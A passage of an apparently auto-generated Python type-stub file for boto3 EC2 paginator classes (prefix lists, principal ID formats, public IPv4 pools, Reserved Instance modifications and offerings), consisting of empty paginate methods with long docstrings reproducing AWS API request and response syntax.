:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribePrefixLists(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, PrefixListIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_prefix_lists`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePrefixLists>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PrefixListIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'PrefixLists': [
{
'Cidrs': [
'string',
],
'PrefixListId': 'string',
'PrefixListName': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **PrefixLists** *(list) --*
All available prefix lists.
- *(dict) --*
Describes prefixes for AWS services.
- **Cidrs** *(list) --*
The IP address range of the AWS service.
- *(string) --*
- **PrefixListId** *(string) --*
The ID of the prefix.
- **PrefixListName** *(string) --*
The name of the prefix.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
One or more filters.
* ``prefix-list-id`` : The ID of a prefix list.
* ``prefix-list-name`` : The name of a prefix list.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PrefixListIds: list
:param PrefixListIds:
One or more prefix list IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribePrincipalIdFormat(Paginator):
def paginate(self, DryRun: bool = None, Resources: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_principal_id_format`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePrincipalIdFormat>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Resources=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Principals': [
{
'Arn': 'string',
'Statuses': [
{
'Deadline': datetime(2015, 1, 1),
'Resource': 'string',
'UseLongIds': True|False
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Principals** *(list) --*
Information about the ID format settings for the ARN.
- *(dict) --*
PrincipalIdFormat description
- **Arn** *(string) --*
PrincipalIdFormatARN description
- **Statuses** *(list) --*
PrincipalIdFormatStatuses description
- *(dict) --*
Describes the ID format for a resource.
- **Deadline** *(datetime) --*
The date in UTC at which you are permanently switched over to using longer IDs. If a deadline is not yet available for this resource type, this field is not returned.
- **Resource** *(string) --*
The type of resource.
- **UseLongIds** *(boolean) --*
Indicates whether longer IDs (17-character IDs) are enabled for the resource.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Resources: list
:param Resources:
The type of resource: ``bundle`` | ``conversion-task`` | ``customer-gateway`` | ``dhcp-options`` | ``elastic-ip-allocation`` | ``elastic-ip-association`` | ``export-task`` | ``flow-log`` | ``image`` | ``import-task`` | ``instance`` | ``internet-gateway`` | ``network-acl`` | ``network-acl-association`` | ``network-interface`` | ``network-interface-attachment`` | ``prefix-list`` | ``reservation`` | ``route-table`` | ``route-table-association`` | ``security-group`` | ``snapshot`` | ``subnet`` | ``subnet-cidr-block-association`` | ``volume`` | ``vpc`` | ``vpc-cidr-block-association`` | ``vpc-endpoint`` | ``vpc-peering-connection`` | ``vpn-connection`` | ``vpn-gateway``
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribePublicIpv4Pools(Paginator):
def paginate(self, PoolIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_public_ipv4_pools`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribePublicIpv4Pools>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PoolIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'PublicIpv4Pools': [
{
'PoolId': 'string',
'Description': 'string',
'PoolAddressRanges': [
{
'FirstAddress': 'string',
'LastAddress': 'string',
'AddressCount': 123,
'AvailableAddressCount': 123
},
],
'TotalAddressCount': 123,
'TotalAvailableAddressCount': 123
},
],
}
**Response Structure**
- *(dict) --*
- **PublicIpv4Pools** *(list) --*
Information about the address pools.
- *(dict) --*
Describes an address pool.
- **PoolId** *(string) --*
The ID of the IPv4 address pool.
- **Description** *(string) --*
A description of the address pool.
- **PoolAddressRanges** *(list) --*
The address ranges.
- *(dict) --*
Describes an address range of an IPv4 address pool.
- **FirstAddress** *(string) --*
The first IP address in the range.
- **LastAddress** *(string) --*
The last IP address in the range.
- **AddressCount** *(integer) --*
The number of addresses in the range.
- **AvailableAddressCount** *(integer) --*
The number of available addresses in the range.
- **TotalAddressCount** *(integer) --*
The total number of addresses.
- **TotalAvailableAddressCount** *(integer) --*
The total number of available addresses.
:type PoolIds: list
:param PoolIds:
The IDs of the address pools.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeReservedInstancesModifications(Paginator):
def paginate(self, Filters: List = None, ReservedInstancesModificationIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_reserved_instances_modifications`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeReservedInstancesModifications>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
ReservedInstancesModificationIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ReservedInstancesModifications': [
{
'ClientToken': 'string',
'CreateDate': datetime(2015, 1, 1),
'EffectiveDate': datetime(2015, 1, 1),
'ModificationResults': [
{
'ReservedInstancesId': 'string',
'TargetConfiguration': {
'AvailabilityZone': 'string',
'InstanceCount': 123,
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'Platform': 'string',
'Scope': 'Availability Zone'|'Region'
}
},
],
'ReservedInstancesIds': [
{
'ReservedInstancesId': 'string'
},
],
'ReservedInstancesModificationId': 'string',
'Status': 'string',
'StatusMessage': 'string',
'UpdateDate': datetime(2015, 1, 1)
},
]
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeReservedInstancesModifications.
- **ReservedInstancesModifications** *(list) --*
The Reserved Instance modification information.
- *(dict) --*
Describes a Reserved Instance modification.
- **ClientToken** *(string) --*
A unique, case-sensitive key supplied by the client to ensure that the request is idempotent. For more information, see `Ensuring Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/Run_Instance_Idempotency.html>`__ .
- **CreateDate** *(datetime) --*
The time when the modification request was created.
- **EffectiveDate** *(datetime) --*
The time for the modification to become effective.
- **ModificationResults** *(list) --*
Contains target configurations along with their corresponding new Reserved Instance IDs.
- *(dict) --*
Describes the modification request/s.
- **ReservedInstancesId** *(string) --*
The ID for the Reserved Instances that were created as part of the modification request. This field is only available when the modification is fulfilled.
- **TargetConfiguration** *(dict) --*
The target Reserved Instances configurations supplied as part of the modification request.
- **AvailabilityZone** *(string) --*
The Availability Zone for the modified Reserved Instances.
- **InstanceCount** *(integer) --*
The number of modified Reserved Instances.
.. note::
This is a required field for a request.
- **InstanceType** *(string) --*
The instance type for the modified Reserved Instances.
- **Platform** *(string) --*
The network platform of the modified Reserved Instances, which is either EC2-Classic or EC2-VPC.
- **Scope** *(string) --*
Whether the Reserved Instance is applied to instances in a region or instances in a specific Availability Zone.
- **ReservedInstancesIds** *(list) --*
The IDs of one or more Reserved Instances.
- *(dict) --*
Describes the ID of a Reserved Instance.
- **ReservedInstancesId** *(string) --*
The ID of the Reserved Instance.
- **ReservedInstancesModificationId** *(string) --*
A unique ID for the Reserved Instance modification.
- **Status** *(string) --*
The status of the Reserved Instances modification request.
- **StatusMessage** *(string) --*
The reason for the status.
- **UpdateDate** *(datetime) --*
The time when the modification request was last updated.
:type Filters: list
:param Filters:
One or more filters.
* ``client-token`` - The idempotency token for the modification request.
* ``create-date`` - The time when the modification request was created.
* ``effective-date`` - The time when the modification becomes effective.
* ``modification-result.reserved-instances-id`` - The ID for the Reserved Instances created as part of the modification request. This ID is only available when the status of the modification is ``fulfilled`` .
* ``modification-result.target-configuration.availability-zone`` - The Availability Zone for the new Reserved Instances.
* ``modification-result.target-configuration.instance-count`` - The number of new Reserved Instances.
* ``modification-result.target-configuration.instance-type`` - The instance type of the new Reserved Instances.
* ``modification-result.target-configuration.platform`` - The network platform of the new Reserved Instances (``EC2-Classic`` | ``EC2-VPC`` ).
* ``reserved-instances-id`` - The ID of the Reserved Instances modified.
* ``reserved-instances-modification-id`` - The ID of the modification request.
* ``status`` - The status of the Reserved Instances modification request (``processing`` | ``fulfilled`` | ``failed`` ).
* ``status-message`` - The reason for the status.
* ``update-date`` - The time when the modification request was last updated.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type ReservedInstancesModificationIds: list
:param ReservedInstancesModificationIds:
IDs for the submitted modification request.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeReservedInstancesOfferings(Paginator):
def paginate(self, AvailabilityZone: str = None, Filters: List = None, IncludeMarketplace: bool = None, InstanceType: str = None, MaxDuration: int = None, MaxInstanceCount: int = None, MinDuration: int = None, OfferingClass: str = None, ProductDescription: str = None, ReservedInstancesOfferingIds: List = None, DryRun: bool = None, InstanceTenancy: str = None, OfferingType: str = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_reserved_instances_offerings`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeReservedInstancesOfferings>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
AvailabilityZone='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
IncludeMarketplace=True|False,
InstanceType='t1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
MaxDuration=123,
MaxInstanceCount=123,
MinDuration=123,
OfferingClass='standard'|'convertible',
ProductDescription='Linux/UNIX'|'Linux/UNIX (Amazon VPC)'|'Windows'|'Windows (Amazon VPC)',
ReservedInstancesOfferingIds=[
'string',
],
DryRun=True|False,
InstanceTenancy='default'|'dedicated'|'host',
OfferingType='Heavy Utilization'|'Medium Utilization'|'Light Utilization'|'No Upfront'|'Partial Upfront'|'All Upfront',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ReservedInstancesOfferings': [
{
'AvailabilityZone': 'string',
'Duration': 123,
'FixedPrice': ...,
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'ProductDescription': 'Linux/UNIX'|'Linux/UNIX (Amazon VPC)'|'Windows'|'Windows (Amazon VPC)',
'ReservedInstancesOfferingId': 'string',
'UsagePrice': ...,
'CurrencyCode': 'USD',
'InstanceTenancy': 'default'|'dedicated'|'host',
'Marketplace': True|False,
'OfferingClass': 'standard'|'convertible',
'OfferingType': 'Heavy Utilization'|'Medium Utilization'|'Light Utilization'|'No Upfront'|'Partial Upfront'|'All Upfront',
'PricingDetails': [
{
'Count': 123,
'Price': 123.0
},
],
'RecurringCharges': [
{
'Amount': 123.0,
'Frequency': 'Hourly'
},
],
'Scope': 'Availability Zone'|'Region'
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeReservedInstancesOfferings.
- **ReservedInstancesOfferings** *(list) --*
A list of Reserved Instances offerings.
- *(dict) --*
Describes a Reserved Instance offering.
- **AvailabilityZone** *(string) --*
The Availability Zone in which the Reserved Instance can be used.
- **Duration** *(integer) --*
The duration of the Reserved Instance, in seconds.
- **FixedPrice** *(float) --*
The purchase price of the Reserved Instance.
- **InstanceType** *(string) --*
The instance type on which the Reserved Instance can be used.
- **ProductDescription** *(string) --*
The Reserved Instance product platform description.
- **ReservedInstancesOfferingId** *(string) --*
The ID of the Reserved Instance offering. This is the offering ID used in GetReservedInstancesExchangeQuote to confirm that an exchange can be made.
- **UsagePrice** *(float) --*
The usage price of the Reserved Instance, per hour.
- **CurrencyCode** *(string) --*
The currency of the Reserved Instance offering you are purchasing. It's specified using ISO 4217 standard currency codes. At this time, the only supported currency is ``USD`` .
- **InstanceTenancy** *(string) --*
The tenancy of the instance.
- **Marketplace** *(boolean) --*
Indicates whether the offering is available through the Reserved Instance Marketplace (resale) or AWS. If it's a Reserved Instance Marketplace offering, this is ``true`` .
- **OfferingClass** *(string) --*
If ``convertible`` it can be exchanged for Reserved Instances of the same or higher monetary value, with different configurations. If ``standard`` , it is not possible to perform an exchange.
- **OfferingType** *(string) --*
The Reserved Instance offering type.
- **PricingDetails** *(list) --*
The pricing details of the Reserved Instance offering.
- *(dict) --*
Describes a Reserved Instance offering.
- **Count** *(integer) --*
The number of reservations available for the price.
- **Price** *(float) --*
The price per instance.
- **RecurringCharges** *(list) --*
The recurring charge tag assigned to the resource.
- *(dict) --*
Describes a recurring charge.
- **Amount** *(float) --*
The amount of the recurring charge.
- **Frequency** *(string) --*
The frequency of the recurring charge.
- **Scope** *(string) --*
Whether the Reserved Instance is applied to instances in a region or an Availability Zone.
:type AvailabilityZone: string
:param AvailabilityZone:
The Availability Zone in which the Reserved Instance can be used.
:type Filters: list
:param Filters:
One or more filters.
* ``availability-zone`` - The Availability Zone where the Reserved Instance can be used.
* ``duration`` - The duration of the Reserved Instance (for example, one year or three years), in seconds (``31536000`` | ``94608000`` ).
* ``fixed-price`` - The purchase price of the Reserved Instance (for example, 9800.0).
* ``instance-type`` - The instance type that is covered by the reservation.
* ``marketplace`` - Set to ``true`` to show only Reserved Instance Marketplace offerings. When this filter is not used, which is the default behavior, all offerings from both AWS and the Reserved Instance Marketplace are listed.
